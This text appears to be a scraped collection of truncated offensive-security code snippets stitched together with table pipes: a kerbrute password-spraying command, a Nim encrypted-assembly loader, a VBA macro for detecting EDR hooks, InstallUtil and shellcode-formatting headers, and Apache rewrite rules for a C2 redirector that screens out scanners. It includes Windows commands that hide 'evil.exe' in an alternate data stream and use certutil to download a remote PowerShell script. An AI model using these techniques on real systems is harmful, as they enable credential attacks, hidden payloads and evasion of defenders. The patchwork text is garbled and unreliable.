With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
import nimcrypto | |
import winim/clr except `[]` # https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/ <-- thank you so much, 2 hours googling I almost went crazy | |
#[ | |
All credit goes to @byt3bl33d3r (OffensiveNim) and @s3cur3th1ssh1t | |
nimble install winim nimcrypto zippy | |
nim c -d:danger -d:strip --opt:size rsrcDecryptAssembly.nim | |
slurp = "staticRead" will read the file and store it in the variable (.rdata) on compile time. |
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
'VBA Macro that detects hooks made by EDRs | |
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
Dim address As LongPtr |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
#!/usr/bin/env python | |
import sys | |
if __name__ == "__main__": | |
if len(sys.argv) < 2: | |
print "usage: %s file.bin\n" % (sys.argv[0],) | |
sys.exit(0) | |
shellcode = "\"" | |
ctr = 1 | |
maxlen = 15 |
###Add content to ADS### | |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
#!/usr/bin/python | |
# -*- coding: utf8 -*- | |
# | |
# Author: Arno0x0x, Twitter: @Arno0x0x | |
# | |
import argparse | |
from Crypto.Cipher import AES | |
import pyscrypt | |
from base64 import b64encode |
#LogLevel alert rewrite:trace3 | |
#Time based access | |
RewriteCond %{TIME_HOUR}%{TIME_MIN} <0600 | |
RewriteCond %{TIME_HOUR}%{TIME_MIN} >1800 | |
RewriteRule ^.*$ replaceme [L] | |
#Day of week based access | |
RewriteCond %{TIME_WDAY} =0 | |
RewriteCond %{TIME_WDAY} =6 | |
RewriteRule ^.*$ replaceme [L] |
RewriteCond %{HTTP_USER_AGENT} "bits|bitsadmin|WindowsPowerShell|certutil|adobe" [NC,OR] | |
RewriteCond %{HTTP_USER_AGENT} "zgrab|+|X11|OpenBSD|Googlebot|python|java|linux|wget|curl|.net|git|virustotalcloud|Gh0st" [NC,OR] | |
RewriteCond %{HTTP_USER_AGENT} "Firefox/3.6.8|Safari|OS x|-|HTTP Banner Detection|Lynx|Slackbot|nmap|burp|cloudfront|bingbot|clshttp|archiver|sparta|loader|email|nikto|nessus|rapid|Qualys|vas|miner|sparta|HTTrack|crawl|shell|yahoo|google|bot|b\-o\-t|spider|baidu" [NC] | |
RewriteCond %{HTTP_USER_AGENT} "android|blackberry|iPhone|googlebot-mobile|Kindle|Nintendo|PlayStation|Windows Phone|XBOX_ONE_ED|AppleTV|Roku|CrOS|iemobile|ipad|iphone|ipod|opera mobile|palmos|webos" [NC] | |
RewriteCond %{HTTP_USER_AGENT} ="" | |
RewriteRule ^.*$ replaceme [L] | |
#User agent string for native compiled software Libs and Linux tools | |
RewriteCond %{HTTP_USER_AGENT} ^googlebot [OR] | |
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR] |
# | |
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
# | |
# Note this version requires Apache 2.4+ | |
# | |
Define REDIR_TARGET |DESTINATIONURL| | |
RewriteEngine On | |
RewriteOptions Inherit | |